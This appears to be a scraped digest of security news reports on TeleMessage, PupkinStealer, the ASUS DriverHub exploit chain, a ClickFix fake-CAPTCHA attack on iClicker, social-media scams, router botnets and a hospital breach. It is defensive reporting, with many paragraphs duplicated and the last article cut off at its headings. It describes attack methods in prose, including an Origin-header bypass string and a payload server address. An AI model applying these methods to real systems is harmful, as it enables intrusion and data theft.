security meets culture
CISA Warns of TeleMessage Vuln Despite Low CVSS Score
By Kristina Beek for darkreading
Though the app claims to use end-to-end encryption, hackers have reportedly accessed archived data on the app's servers via a new vulnerability.
Though the app claims to use end-to-end encryption, hackers have reportedly accessed archived data on the app's servers via a new vulnerability.
Source: imageBROKER.com via Alamy Stock Photo
The Cybersecurity and Infrastructure Security Agency (CISA) is warning users of a privacy vulnerability under exploitation in the messaging application TeleMessage-- the very same one used by Michael Waltz, former national security adviser to President Donald Trump.
TeleMessage makes modified versions of popular messaging applications such as Signal, WhatsApp, Telegram, and WeChat. TeleMessage's knockoff Signal app, known as TM SGNL, looks identical to the authentic version of Signal. The only difference is that it archives copies of every message "to a destination determined by the TeleMessage customer."
This is according to information security and software engineer Micah Lee, who posted an analysis of the weakness on his blog and asserted that the app uses "misleading marketing" because it claims to support end-to-end encryption, when it actually doesn't.
TM SGNL operates on a server hosted on AWS cloud that not only has plaintext access to the Signal chat logs they're archiving, but also the chat logs of Telegram, WeChat, and WhatsApp. This is because TM SGNL is interoperable with Signal, Lee explained, meaning that when a user registers as a new account with TM SGNL, they're registering it with the official Signal server, allowing them to send messages to true Signal users and vice versa.
"If you're a Signal user, you have no way of knowing when you're talking to a TM SGNL user, because the apps are nearly identical and use the same infrastructure," wrote Lee in the post. "This is how Mike Waltz could accidentally add The Atlantic editor-in-chief Jeffrey Goldberg to a group chat where they discussed bombing an apartment building full of civilians: Waltz was presumably using TM SGNL, and Goldberg was presumably using Signal."
While the aforementioned leak occurred due to an error made by a user, hackers could exploit the lack of end-to-end encryption on TM SGNL and obtain user data from TeleMessage's archive server.
The vulnerability, tracked as CVE-2025-47729 is still undergoing analysis by the National Institute of Standards and Technology (NIST) but has been assigned a CVSS score of 1.9. Despite this low severity score the security issue has been exploited in the wild by hackers who have obtained user data from the TeleMessage archive server, such as private Telegram messages. CISA added the flaw to its Known Exploited Vulnerabilities (KEV) catalog on Monday.
As for users, there isn't much they can do on their end at this time to mitigate the flaw until it's addressed on the server-side, beyond discontinuing their use of the product.
TeleMessage makes modified versions of popular messaging applications such as Signal, WhatsApp, Telegram, and WeChat. TeleMessage's knockoff Signal app, known as TM SGNL, looks identical to the authentic version of Signal. The only difference is that it archives copies of every message "to a destination determined by the TeleMessage customer."
This is according to information security and software engineer Micah Lee, who posted an analysis of the weakness on his blog and asserted that the app uses "misleading marketing" because it claims to support end-to-end encryption, when it actually doesn't.
TM SGNL operates on a server hosted on AWS cloud that not only has plaintext access to the Signal chat logs they're archiving, but also the chat logs of Telegram, WeChat, and WhatsApp. This is because TM SGNL is interoperable with Signal, Lee explained, meaning that when a user registers as a new account with TM SGNL, they're registering it with the official Signal server, allowing them to send messages to true Signal users and vice versa.
"If you're a Signal user, you have no way of knowing when you're talking to a TM SGNL user, because the apps are nearly identical and use the same infrastructure," wrote Lee in the post. "This is how Mike Waltz could accidentally add The Atlantic editor-in-chief Jeffrey Goldberg to a group chat where they discussed bombing an apartment building full of civilians: Waltz was presumably using TM SGNL, and Goldberg was presumably using Signal."
While the aforementioned leak occurred due to an error made by a user, hackers could exploit the lack of end-to-end encryption on TM SGNL and obtain user data from TeleMessage's archive server.
The vulnerability, tracked as CVE-2025-47729 is still undergoing analysis by the National Institute of Standards and Technology (NIST) but has been assigned a CVSS score of 1.9. Despite this low severity score the security issue has been exploited in the wild by hackers who have obtained user data from the TeleMessage archive server, such as private Telegram messages. CISA added the flaw to its Known Exploited Vulnerabilities (KEV) catalog on Monday.
As for users, there isn't much they can do on their end at this time to mitigate the flaw until it's addressed on the server-side, beyond discontinuing their use of the product.
New Attack Exploits X/Twitter Ad URL Feature to Deceive Users
By Aman Mishra for gbhackers
gbhackers
Silent Push Threat Analysts have recently exposed a sophisticated financial scam leveraging a vulnerability in X/Twitter's advertising display URL feature to deceive users.
This attack manipulates the platform's URL display mechanism to present a legitimate-looking link, such as "From CNN[.]com," while redirecting unsuspecting victims to a malicious cryptocurrency scam site impersonating Apple's brand.
This campaign, centered around a fictitious "Apple iToken," represents a new level of deception in social media advertising fraud, exploiting technical loopholes to trick users into engaging with harmful content.
This attack manipulates the platform's URL display mechanism to present a legitimate-looking link, such as "From CNN[.]com," while redirecting unsuspecting victims to a malicious cryptocurrency scam site impersonating Apple's brand.
This campaign, centered around a fictitious "Apple iToken," represents a new level of deception in social media advertising fraud, exploiting technical loopholes to trick users into engaging with harmful content.
X/Twitter Screenshot of the Order ID error message
Spoofed URLs in X/Twitter Ads
The core of this attack lies in an exploit of X/Twitter's URL handling and metadata retrieval process.
When a URL is posted on the platform, X/Twitter's bot fetches metadata using a consistent User Agent (UA) string to generate a preview card.
Malicious actors exploit this by configuring their servers to redirect the bot to a benign site like cnn[.]com, while real users are rerouted to a fraudulent domain such as ipresale[.]world.
Alternatively, attackers use URL shorteners like bit[.]ly to initially point to a legitimate site for metadata collection, later updating the redirect to a malicious destination.
This results in a preview card that displays a trusted domain, masking the true, harmful landing page.
After the redirect chain-often involving intermediate links like t[.]co/OswjDCIcFI-victims land on scam sites promoting a fake cryptocurrency presale.
These sites, complete with forged endorsements from Apple CEO Tim Cook, lure users into creating accounts and transferring funds to one of 22 provided crypto wallets across various blockchain networks, including Bitcoin, Ethereum, and Solana.
Screenshot of X/Twitter ad abusing the Apple brand
Silent Push Uncovers Crypto Scam Network
Further investigation by Silent Push revealed a sprawling network of nearly 90 related domains, active since 2024, likely operated by the same threat actor group.
The campaign expanded with a second X/Twitter ad on May 5, 2025, redirecting through chopinkos[.]digital to itokensale[.]live, displaying nearly identical scam content.
Using advanced tools like Silent Push's Web Resource Scan, analysts identified reused files, favicons, and infrastructure fingerprints-such as specific IP addresses-- e.g., 51.15.17[.]214-- and name servers-- ns1.chsw.host-- linking these domains to a broader ecosystem of financial fraud.
Many sites also abuse Apple trademarks or impersonate other brands, with some tied to suspicious .ru domains, though direct attribution remains uncertain.
This sophisticated operation underscores the evolving tactics of cybercriminals in exploiting social media platforms for financial gain, highlighting the urgent need for enhanced URL validation mechanisms and user awareness.
Below is a curated list of Indicators of Compromise (IOCs) associated with this campaign, provided by Silent Push to aid in threat detection and mitigation:
PupkinStealer - .NET Malware Steals Browser Data and Exfiltrates
via Telegram
By Aman Mishra for gbhackers
gbhackers
A new information-stealing malware dubbed "PupkinStealer" has emerged as a significant threat to individuals and enterprises.
Developed in C# using the .NET framework, this 32-bit GUI-based Windows executable targets sensitive user data with a focused and efficient approach.
First observed in April 2025, PupkinStealer is designed to harvest a specific range of data, including browser credentials, personal files from desktops, session information from messaging platforms like Telegram and Discord, and desktop screenshots.
What makes this malware particularly insidious is its method of exfiltration, leveraging the Telegram Bot API to transmit stolen data to attacker-controlled servers with minimal traceability.
Developed in C# using the .NET framework, this 32-bit GUI-based Windows executable targets sensitive user data with a focused and efficient approach.
First observed in April 2025, PupkinStealer is designed to harvest a specific range of data, including browser credentials, personal files from desktops, session information from messaging platforms like Telegram and Discord, and desktop screenshots.
What makes this malware particularly insidious is its method of exfiltration, leveraging the Telegram Bot API to transmit stolen data to attacker-controlled servers with minimal traceability.
Bot details: used in exfiltration
A New Threat in the Cyber Landscape
PupkinStealer, with a file size of 6.21 MB and identified by the MD5 hash fc99a7ef8d7a2028ce73bf42d3a95bce, operates by initiating multiple asynchronous tasks upon execution.
Its Main() method, managed by the .NET Common Language Runtime (CLR), orchestrates data theft through distinct modules.
One primary function targets Chromium-based browsers such as Chrome, Edge, and Opera by extracting decryption keys from Local State files and decrypting saved credentials stored in SQLite databases using AES-GCM algorithms.
PupkinStealerMain() function
Additionally, it scans the victim's desktop for files with extensions like .pdf, .txt, and .jpg, copying them to a temporary directory.
The malware also exfiltrates Telegram session data by copying the 'tdata' folder, enabling unauthorized account access without credentials, while Discord tokens are harvested from leveldb storage using regular expressions for potential impersonation.
Technical Breakdown of Malicious Operations
A screenshot of the primary screen at 1920×1080 resolution is captured and, along with all collected data, compressed into a ZIP archive with embedded metadata such as username, IP address, and Security Identifier (SID).
According to Cyfirma Report, this archive, often named in the format [Username]@ardent.zip, is then sent to a Telegram bot identified as 'botkanalchik_bot' using a crafted API URL, incorporating detailed system information in the caption.
Attributed to a developer alias "Ardent," as evidenced by embedded code strings, PupkinStealer lacks advanced obfuscation or persistence mechanisms, relying instead on low-profile execution to evade detection.
Its use of legitimate services like Telegram for command-and-control highlights a growing trend among cybercriminals favoring anonymity and ease of use.
As part of a broader landscape of modular infostealers, PupkinStealer underscores the evolving simplicity and accessibility of malware-as-a-service offerings, posing a challenge to cybersecurity defenses.
Organizations are urged to implement robust endpoint security, continuous network monitoring, and user awareness training to mitigate risks associated with such threats.
ASUS DriverHub Flaw Let Malicious Sites Run Commands
with Admin Rights
By Bill Toulas for bleepingcomputer
bleepingcomputer
The ASUS DriverHub driver management utility was vulnerable to a critical remote code execution flaw that allowed malicious sites to execute commands on devices with the software installed.
The flaw was discovered by an independent cybersecurity researcher from New Zealand named Paul-- aka "MrBruh"-- who found that the software had poor validation of commands sent to the DriverHub background service.
This allowed the researcher to create an exploit chain utilizing flaws tracked as CVE-2025-3462 and CVE-2025-3463 that, when combined, achieve origin bypass and trigger remote code execution on the target.
The DriverHub problem
DriverHub is ASUS's official driver management tool that is automatically installed on the first system boot when utilizing certain ASUS motherboards.
This software runs in the background, automatically detecting and fetching the latest driver versions for the detected motherboard model and its chipset.
Once installed, the tool remains active and running in the background via a local service on port 53000, continually checking for important driver updates.
Meanwhile, most users don't even know such a service is constantly running on their system.
That service checks the Origin Header of incoming HTTP requests to reject anything that doesn't come from 'driverhub.asus.com.'
However, this check is poorly implemented, as any site that includes that string is accepted even if it's not an exact match to ASUS's official portal.
The second issue lies in the UpdateApp endpoint, which allows DriverHub to download and run .exe files from ".asus.com" URLs without user confirmation.
The flaw was discovered by an independent cybersecurity researcher from New Zealand named Paul-- aka "MrBruh"-- who found that the software had poor validation of commands sent to the DriverHub background service.
This allowed the researcher to create an exploit chain utilizing flaws tracked as CVE-2025-3462 and CVE-2025-3463 that, when combined, achieve origin bypass and trigger remote code execution on the target.
The DriverHub problem
DriverHub is ASUS's official driver management tool that is automatically installed on the first system boot when utilizing certain ASUS motherboards.
This software runs in the background, automatically detecting and fetching the latest driver versions for the detected motherboard model and its chipset.
Once installed, the tool remains active and running in the background via a local service on port 53000, continually checking for important driver updates.
Meanwhile, most users don't even know such a service is constantly running on their system.
That service checks the Origin Header of incoming HTTP requests to reject anything that doesn't come from 'driverhub.asus.com.'
However, this check is poorly implemented, as any site that includes that string is accepted even if it's not an exact match to ASUS's official portal.
The second issue lies in the UpdateApp endpoint, which allows DriverHub to download and run .exe files from ".asus.com" URLs without user confirmation.
The BIOS setting concerning DriverHub (Enabled by default). Source: MrBruh
Stealthy attack flow
An attacker can target any user with ASUS DriverHub running on their system to trick them into visiting a malicious website on their browser. This website then sends "UpdateApp requests" to the local service at 'http://127.0.0.1:53000.'
By spoofing the Origin Header to something like 'driverhub.asus.com.mrbruh.com,' the weak validation check is bypassed, so DriverHub accepts the commands.
In the researcher's demonstration, the commands order the software to download a legitimate ASUS-signed 'AsusSetup.exe' installer from the vendor's download portal, along with a malicious .ini file and .exe payload.
The ASUS-signed installer is silently run as admin and uses the configuration information in the .ini file. This ini file directs the legitimate ASUS driver installer to launch the malicious executable file.
The attack is also made possible by the tool failing to delete files that fail signature checks, like the .ini and payload, which are kept on the host after their download.
An attacker can target any user with ASUS DriverHub running on their system to trick them into visiting a malicious website on their browser. This website then sends "UpdateApp requests" to the local service at 'http://127.0.0.1:53000.'
By spoofing the Origin Header to something like 'driverhub.asus.com.mrbruh.com,' the weak validation check is bypassed, so DriverHub accepts the commands.
In the researcher's demonstration, the commands order the software to download a legitimate ASUS-signed 'AsusSetup.exe' installer from the vendor's download portal, along with a malicious .ini file and .exe payload.
The ASUS-signed installer is silently run as admin and uses the configuration information in the .ini file. This ini file directs the legitimate ASUS driver installer to launch the malicious executable file.
The attack is also made possible by the tool failing to delete files that fail signature checks, like the .ini and payload, which are kept on the host after their download.
ASUS' response and user action
ASUS received the researcher's reports on April 8, 2025, and implemented a fix on April 18, after validating it with MrBruh the day before. The hardware giant did not offer the researcher any bounty for his disclosure.
The CVE descriptions, which the Taiwanese vendor submitted, somewhat downplays the issue with the following statement:
"This issue is limited to motherboards and does not affect laptops, desktop computers, or other endpoints," reads the CVE description.
This is confusing, as the mentioned CVEs impact laptops and desktop computers with DriverHub installed.
However, ASUS is clearer in its security bulletin, advising users to quickly apply the latest update.
"This update includes important security updates and ASUS strongly recommends that users update their ASUS DriverHub installation to the latest version," reads the bulletin.
"The latest Software Update can be accessed by opening ASUS DriverHub, then clicking the Update Now button."
MrBruh says he monitored certificate transparency updates and found no other TLS certificates containing the "driverhub.asus.com" string, indicating it was not exploited in the wild.
If you're uncomfortable with a background service automatically fetching potentially dangerous files upon visiting websites, you may disable DriverHub from your BIOS settings.
iClicker Site Hack Targeted Students with Malware via Fake CAPTCHA
By Lawrence Abrams for bleepingcomputer
bleepingcomputer
The website of iClicker, a popular student engagement platform, was compromised in a ClickFix attack that used a fake CAPTCHA prompt to trick students and instructors into installing malware on their devices.
iClicker is a subsidiary of Macmillan and is a digital classroom tool that allows instructors to take attendance, ask live questions or surveys, and track student engagement. It is widely used by 5,000 instructors and 7 million students at colleges and universities across the United States, including the University of Michigan, the University of Florida, and universities in California.
According to a security alert from the University of Michigan's Safe Computing team, the iClicker site was hacked between April 12 and April 16, 2025, to display a fake CAPTCHA that instructed users to press "I'm not a robot" to verify themselves.
However, when visitors clicked on the verification prompt, a PowerShell script was silently copied into the Windows clipboard in what is known as a "ClickFix" social engineering attack.
The CAPTCHA would then instruct users to open the Windows Run dialog-- Win + R-- paste the PowerShell script-- Ctrl + V-- into it, and execute it by pressing Enter to verify themselves.
iClicker is a subsidiary of Macmillan and is a digital classroom tool that allows instructors to take attendance, ask live questions or surveys, and track student engagement. It is widely used by 5,000 instructors and 7 million students at colleges and universities across the United States, including the University of Michigan, the University of Florida, and universities in California.
According to a security alert from the University of Michigan's Safe Computing team, the iClicker site was hacked between April 12 and April 16, 2025, to display a fake CAPTCHA that instructed users to press "I'm not a robot" to verify themselves.
However, when visitors clicked on the verification prompt, a PowerShell script was silently copied into the Windows clipboard in what is known as a "ClickFix" social engineering attack.
The CAPTCHA would then instruct users to open the Windows Run dialog-- Win + R-- paste the PowerShell script-- Ctrl + V-- into it, and execute it by pressing Enter to verify themselves.
Example of a fake CAPTCHA in a ClickFix attack. Source: SilentPush
While the ClickFix attack is no longer running on iClicker's site, a person on Reddit launched the command on Any.Run, revealing the PowerShell payload that gets executed.
The PowerShell command used in the iClicker attack was heavily obfuscated, but when executed, it would connect to a remote server at http://67.217.228[.]14:8080 to retrieve another PowerShell script that would be executed.
Obfuscated PowerShell script used in iClicker ClickFix attack. Source: BleepingComputer
Unfortunately, it is not known what malware was ultimately installed, as the retrieved PowerShell script was different depending on the type of visitor.
For targeted visitors, it would send a script that downloads malware onto the computer. The University of Michigan says that the malware allowed the threat actor to have full access to the infected device.
For those who were not targeted, such as malware analysis sandboxes, the script would instead download and run the legitimate Microsoft Visual C++ Redistributable, as shown below.
ClickFix attacks have become widespread social engineering attacks that have been used in numerous malware campaigns, including those pretending to be a Cloudflare CAPTCHA, Google Meet, and web browser errors.
From past campaigns, the attack likely distributed an infostealer, which can steal cookies, credentials, passwords, credit cards, and browsing history from Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium browsers.
This type of malware can also steal cryptocurrency wallets, private keys, and text files likely to contain sensitive information, such as those named seed.txt, pass.txt, ledger.txt, trezor.txt, metamask.txt, bitcoin.txt, words, wallet.txt, *.txt, and *.pdf.
This data is collected into an archive and sent back to the attacker, where they can use the information in further attacks or sell it on cybercrime marketplaces.
The stolen data can also be used to conduct widescale breaches that lead to ransomware attacks. As the attack targeted college students and instructors, the goal could have been to steal credentials to conduct attacks on college networks.
BleepingComputer contacted MacMillan multiple times with questions regarding this attack this week, but did not respond to our questions.
However, BleepingComputer later found that iClicker published a security bulletin on its website on May 6 but included a <meta name='robots' content='noindex, nofollow' /> tag in the page's HTML, preventing the document from being indexed by search engines and thus making it more difficult to find information on the incident.
iClicker security bulletin published with a noindex tag. Source: BleepingComputer
"We recently resolved an incident affecting the iClicker landing page-- iClicker.com. Importantly, no iClicker data, apps, or operations were impacted and the identified vulnerability on the iClicker landing page has been resolved," reads iClicker's security bulletin.
"What happened: an unrelated 3rd-party placed a false Captcha on our iClicker landing page before users logged into iClicker on our website. This 3rd-party was hoping to get users to click on the false captcha similar to what we unfortunately experience quite often in phishing emails these days."
"Out of an abundance of caution, we recommend that any faculty or student who encountered and clicked on the false Captcha from April 12- April 16 on our website run security software to ensure their devices remain protected."
Users who accessed iClicker.com while the site was hacked and followed the fake CAPTCHA instructions should immediately change their iClicker password, and if the command was executed, change all passwords stored on their computer to a unique one for every site.
To help with this, it is suggested that you use a password manager like BitWarden or 1Password.
It's important to note that users who accessed iClicker through the mobile app or did not encounter the fake CAPTCHA are not at risk from the attack.
These Are the 6 Ways Scammers Use TikTok to Infect Your Devices
with Malware
By Vinayak Guhanarayan for makeuseof
Tatiana Diuvbanova / Shutterstock
There aren't many social media platforms as engaging as TikTok, but its popularity also makes it a target for scammers. If you love scrolling TikTok, watch out for these scams that could infect your device with malware.
Fake 'Unfilter' or 'Reveal' Tools
Scammers often promote tools that help people remove filters or blurred/blacked-out sections from videos. To make it more convincing, a scammer might show a blurred image in their video, pretend to run it through a special tool, and then cut to a seemingly unfiltered version, which creates the illusion that this special tool helps unblur or unfilter elements.
In reality, these videos are completely fabricated. If you download the tool they're advertising, you risk installing malware on your device. So, if you see a video on TikTok that advertises similar tools, it's best to avoid clicking any links in the description. There are several legit ways to unblur images, but none magically reveal sensitive elements in a photo. Anyone claiming to have a tool that does this is likely trying to mislead you.
'Secret' or 'Pro' TikTok Apps for Access to Exclusive Features
Fake 'Unfilter' or 'Reveal' Tools
Scammers often promote tools that help people remove filters or blurred/blacked-out sections from videos. To make it more convincing, a scammer might show a blurred image in their video, pretend to run it through a special tool, and then cut to a seemingly unfiltered version, which creates the illusion that this special tool helps unblur or unfilter elements.
In reality, these videos are completely fabricated. If you download the tool they're advertising, you risk installing malware on your device. So, if you see a video on TikTok that advertises similar tools, it's best to avoid clicking any links in the description. There are several legit ways to unblur images, but none magically reveal sensitive elements in a photo. Anyone claiming to have a tool that does this is likely trying to mislead you.
'Secret' or 'Pro' TikTok Apps for Access to Exclusive Features
TikTok
TikTok has a few companion apps, like TikTok Studio-- meant for creators-- and TikTok Lite-- a data-friendly version of the regular app. But these versions are not widely known. There are also TikTok Business accounts, but this is just a distinct account type you can switch to within your app-- Profile > Menu > Account and select Switch to Business Account. If you're unfamiliar with TikTok, it's easy to assume that there might be a secret version of the app or a Pro account that offers exclusive features.
Scammers take advantage of this and advertise fake TikTok apps. They usually claim these apps offer exclusive perks, like an increased follower count or access to hidden editing tools. The downside, of course, is that if you come across one of these shady videos promoting such an app, and you download it, you might just end up infecting your device with malware.
Fake Giveaways
Scammers run fake giveaways on many social media platforms, including TikTok. These giveaways usually promise an expensive gift to the winner, like the latest iPhone, gift cards, or even just money, making them all the more enticing to enter.
Typically, giveaway videos on TikTok ask you to submit your entry by navigating to a URL mentioned in the description or the bio section. Once you're there, you might be prompted to share sensitive details that could be used for identity theft, or you might be asked to download an app to complete your entry, which can lead to malware being installed on your device. Now, I'm not saying legit influencers and companies don't run giveaways, but these giveaways are usually posted by verified accounts. If the giveaway feels shady, it's best not to proceed.
QR Code Scams
Another sneaky tactic scammers use on TikTok is posting videos with QR codes. Viewers are asked to scan the QR code to access sensitive content, hidden features, or enter giveaways.
But these QR codes are often fake and simply exist to redirect you to malicious websites that download malware onto your device. Given that scams of this nature are really common these days, be sure to learn how to spot fake QR codes.
Messages From Fake Celebrity/Influencer Accounts
TikTok
Scammers often create fake accounts for celebrities and influencers to trick people into believing they're interacting with someone famous. These accounts look pretty similar to the real ones, and might even have the same photos-- which are stolen, of course. Once the account has sufficient followers, scammers start sending direct messages to people. These messages might include links to phishing pages or might prompt a malware download, but it's hard to tell because you're not expecting someone famous to scam you.
If you receive a DM from a famous person on TikTok or any other social media platform, for that matter, don't click anything or continue interacting unless you're sure it's legit, which you can determine by checking if there's a blue checkmark beside the account name. That said, scammers might also use photos with blue checkmarks to make the account seem authentic. So, verify if the blue checkmark appears next to the account name in the profile header before interacting with an account.
Fake Copyright Violation Notices
If you're a creator or even just a casual TikTok user who creates the occasional video for yourself, receiving a copyright violation notice can be alarming. Scammers try to take advantage of this by sending fake copyright violation notices that seem like they came from TikTok.
These notices might include a link to view the entire message or verify the details of your account. With these fake notices, though, nothing good comes from clicking the included link. If you receive a similar notice, don't act hastily. Check the official TikTok app and your account for any notifications, as well as your email. If you're unsure, use TikTok's support center to report a problem.
Social media is packed with scam ads and videos. While some of them are easy to spot, others are cleverly disguised and might even seem like they come from a legit influencer or TikTok itself. Staying on guard and avoiding suspicious links can go a long way in protecting you and keeping your device safe from malware.
If Your Router is on This FBI List, You Need to Upgrade it Immediately
By Yadullah Abidi for makeuseof
Yadullah Abidi / MakeUseOf
Routers are critical pieces of network infrastructure that can theoretically last for decades. But if they are too old, hackers might come knocking.
Old Routers Are a Threat to Your Network
The FBI has discovered a group of hackers exploiting old routers to pull off cyberattacks. The agency's announcement includes a list of 13 routers that have reached "end of life" status, meaning they no longer receive software updates to fix known vulnerabilities.
The following routers are being targeted:
All routers have a management interface that can be accessed by connecting to the router via Ethernet or WiFi, or over the internet. If the interface is exposed to the internet, hackers can exploit a router's known vulnerability to upload malware and gain administrator access.
The malware being used in the attack is called TheMoon, first found on compromised routers in 2014. The FBI's announcement claims that it doesn't require a password to infect routers. The malware scans for open ports and sends a command to a vulnerable script on the router. Once the command executes, it establishes a command and control (C2) server, which then responds with further instructions.
The malware uploaded to the targeted routers lets hackers maintain persistent access to the device, allowing them to use it as part of a larger botnet. The botnets are then used to launch coordinated DDoS attacks or sold as a proxy service that hackers use to conceal their IP address and identity.
The agency also seized 2 websites-- Anyproxy and 5Socks-- which were using the hacked routers to offer proxy services to "help cybercriminals hide their activities." The sites have been updated to show a Justice Department seizure notice.
How Can You Protect Yourself?
If you use one of the routers mentioned above, the best course of action is to upgrade your router to a newer model. Aside from better security, you'll also enjoy faster internet speeds and a more stable WiFi connection. Even if your router isn't on the list above, but has reached end-of-life status, a replacement is the way to go.
In case you can't replace your router right away, disable any remote management or administration features in the router's control panel. The specific instructions for doing so will vary from router to router, so I recommend looking up your router's model number for more information. Your router is one of the most vulnerable devices in your home, and should be secured appropriately.
For those of you who do own newer routers, check for new updates frequently to make sure your router is protected against any vulnerabilities that hackers can exploit. Unless you explicitly need your router's remote management capabilities, I'd recommend turning the feature off for better protection.
Old Routers Are a Threat to Your Network
The FBI has discovered a group of hackers exploiting old routers to pull off cyberattacks. The agency's announcement includes a list of 13 routers that have reached "end of life" status, meaning they no longer receive software updates to fix known vulnerabilities.
The following routers are being targeted:
- Cisco M10
- Cisco Linksys E1500
- Cisco Linksys E1550
- Cisco Linksys WRT610N
- Cisco Linksys E1000
- Cradlepoint E100
- Cradlepoint E300
- Linksys E1200
- Linksys E2500
- Linksys E3200
- Linksys WRT320N
- Linksys E4200
- Linksys WRT310N
All routers have a management interface that can be accessed by connecting to the router via Ethernet or WiFi, or over the internet. If the interface is exposed to the internet, hackers can exploit a router's known vulnerability to upload malware and gain administrator access.
The malware being used in the attack is called TheMoon, first found on compromised routers in 2014. The FBI's announcement claims that it doesn't require a password to infect routers. The malware scans for open ports and sends a command to a vulnerable script on the router. Once the command executes, it establishes a command and control (C2) server, which then responds with further instructions.
The malware uploaded to the targeted routers lets hackers maintain persistent access to the device, allowing them to use it as part of a larger botnet. The botnets are then used to launch coordinated DDoS attacks or sold as a proxy service that hackers use to conceal their IP address and identity.
The agency also seized 2 websites-- Anyproxy and 5Socks-- which were using the hacked routers to offer proxy services to "help cybercriminals hide their activities." The sites have been updated to show a Justice Department seizure notice.
How Can You Protect Yourself?
If you use one of the routers mentioned above, the best course of action is to upgrade your router to a newer model. Aside from better security, you'll also enjoy faster internet speeds and a more stable WiFi connection. Even if your router isn't on the list above, but has reached end-of-life status, a replacement is the way to go.
In case you can't replace your router right away, disable any remote management or administration features in the router's control panel. The specific instructions for doing so will vary from router to router, so I recommend looking up your router's model number for more information. Your router is one of the most vulnerable devices in your home, and should be secured appropriately.
For those of you who do own newer routers, check for new updates frequently to make sure your router is protected against any vulnerabilities that hackers can exploit. Unless you explicitly need your router's remote management capabilities, I'd recommend turning the feature off for better protection.
Ascension Says Recent Data Breach Affects Over 430,000 Patients
By Sergiu Gatlan for bleepingcomputer
bleepingcomputer
Ascension, one of the largest private healthcare systems in the United States, has revealed that a data breach disclosed last month affects the personal and healthcare information of over 430,000 patients.
The healthcare network has over 142,000 employees, operates 142 hospitals nationwide, and reported a revenue of $28.3 billion in 2023.
As Ascension revealed in breach notification letters sent to affected individuals in April, their information was stolen in a data theft attack that impacted a former business partner in December.
Depending on the impacted patient, the attackers could access personal health information related to inpatient visits, including the physician's name, admission and discharge dates, diagnosis and billing codes, medical record number, and insurance company name. They could also gain access to personal information, including name, address, phone number(s), email address, date of birth, race, gender, and Social Security numbers (SSNs).
"On December 5, 2024, we learned that Ascension patient information may have been involved in a potential security incident. We immediately initiated an investigation to determine whether and how a security incident occurred," Ascension said.
"Our investigation determined on January 21, 2025, that Ascension inadvertently disclosed information to a former business partner, and some of this information was likely stolen from them due to a vulnerability in 3rd-party software used by the former business partner."
While Ascension didn't reveal the total number of affected individuals at the time, an April 29 filing said that the incident impacted 114,692 individuals in Texas, and the company also told Massachusetts' Office of the Attorney General that 96 residents had their medical records and SSNs exposed in the incident.
However, the healthcare giant also disclosed in an April 28 filing with the US Department of Health & Human Services (HHS) that wasn't published until today that the data breach affected 437,329 individuals.
The healthcare network has over 142,000 employees, operates 142 hospitals nationwide, and reported a revenue of $28.3 billion in 2023.
As Ascension revealed in breach notification letters sent to affected individuals in April, their information was stolen in a data theft attack that impacted a former business partner in December.
Depending on the impacted patient, the attackers could access personal health information related to inpatient visits, including the physician's name, admission and discharge dates, diagnosis and billing codes, medical record number, and insurance company name. They could also gain access to personal information, including name, address, phone number(s), email address, date of birth, race, gender, and Social Security numbers (SSNs).
"On December 5, 2024, we learned that Ascension patient information may have been involved in a potential security incident. We immediately initiated an investigation to determine whether and how a security incident occurred," Ascension said.
"Our investigation determined on January 21, 2025, that Ascension inadvertently disclosed information to a former business partner, and some of this information was likely stolen from them due to a vulnerability in 3rd-party software used by the former business partner."
While Ascension didn't reveal the total number of affected individuals at the time, an April 29 filing said that the incident impacted 114,692 individuals in Texas, and the company also told Massachusetts' Office of the Attorney General that 96 residents had their medical records and SSNs exposed in the incident.
However, the healthcare giant also disclosed in an April 28 filing with the US Department of Health & Human Services (HHS) that wasn't published until today that the data breach affected 437,329 individuals.
Breach details shared with the HHS (BleepingComputer)
Ascension offers 2 years of free identity monitoring services to those impacted by this incident, including credit monitoring, fraud consultation, and identity theft restoration.
Although Ascension didn't share any details regarding the breach affecting its former business partner, the timeline of the breach implies that the attack was part of widespread Clop ransomware data theft attacks that exploited a zero-day flaw in Cleo secure file transfer software.
Last year, Ascension also notified almost 5.6 million patients and employees that their personal, financial, insurance, and health information had been stolen in a May 2024 Black Basta ransomware attack.
After the incident, the healthcare organization revealed that the ransomware breach resulted from an employee downloading a malicious file onto a company device.
Following the May 2024 attack, employees were forced to keep track of procedures and medications on paper, as patients' electronic records couldn't be accessed. Ascension also had to pause some non-emergent elective procedures, tests, and appointments and redirect emergency medical services to unaffected healthcare units to prevent triage delays.
Ascension offers 2 years of free identity monitoring services to those impacted by this incident, including credit monitoring, fraud consultation, and identity theft restoration.
Although Ascension didn't share any details regarding the breach affecting its former business partner, the timeline of the breach implies that the attack was part of widespread Clop ransomware data theft attacks that exploited a zero-day flaw in Cleo secure file transfer software.
Last year, Ascension also notified almost 5.6 million patients and employees that their personal, financial, insurance, and health information had been stolen in a May 2024 Black Basta ransomware attack.
After the incident, the healthcare organization revealed that the ransomware breach resulted from an employee downloading a malicious file onto a company device.
Following the May 2024 attack, employees were forced to keep track of procedures and medications on paper, as patients' electronic records couldn't be accessed. Ascension also had to pause some non-emergent elective procedures, tests, and appointments and redirect emergency medical services to unaffected healthcare units to prevent triage delays.
Beware of Phone Scams Demanding Money for 'Missed Jury Duty'
By Phil Muncaster for welivesecurity
When we get the call, it's our legal responsibility to attend jury service. But sometimes that call won't come from the courts-- it will be a scammer.
When we get the call, it's our legal responsibility to attend jury service. But sometimes that call won't come from the courts-- it will be a scammer.
welivesecurity
Jury duty is one of the key civic duties you may be called upon to serve. But in your haste to fulfill this obligation, you may be targeted by malicious actors preying on your fear of arrest, penalties or other legal trouble. Indeed, jury duty cons have been a long-running scheme where fraudsters pretend to be the government.
As always, awareness is the best defense against these persistent attempts to steal your hard-earned money or personal information. So take a few minutes to arm yourself with some essential knowledge.
How to spot a jury duty scam
Jury duty/service scams are nothing new. In fact, United States Courts has been warning its citizens about them for over a decade. They're also far from limited to North America. The UK's Chartered Trading Standards Institute has in the past also warned about bogus texts inviting recipients to jury service, or risk facing fines.
So what do they typically involve?
Broadly speaking, victims will receive a phone call, text or email from a scammer impersonating a law enforcement officer or court official. They will claim the victim hasn't shown up for their allotted jury service and must pay a fine as a result. They may often also ask for personal information, which will be sold on the dark web and/or used to commit follow-on identity fraud.
Look out for the following tell-tale signs of a jury duty scam:
How to stay safe from jury duty scams
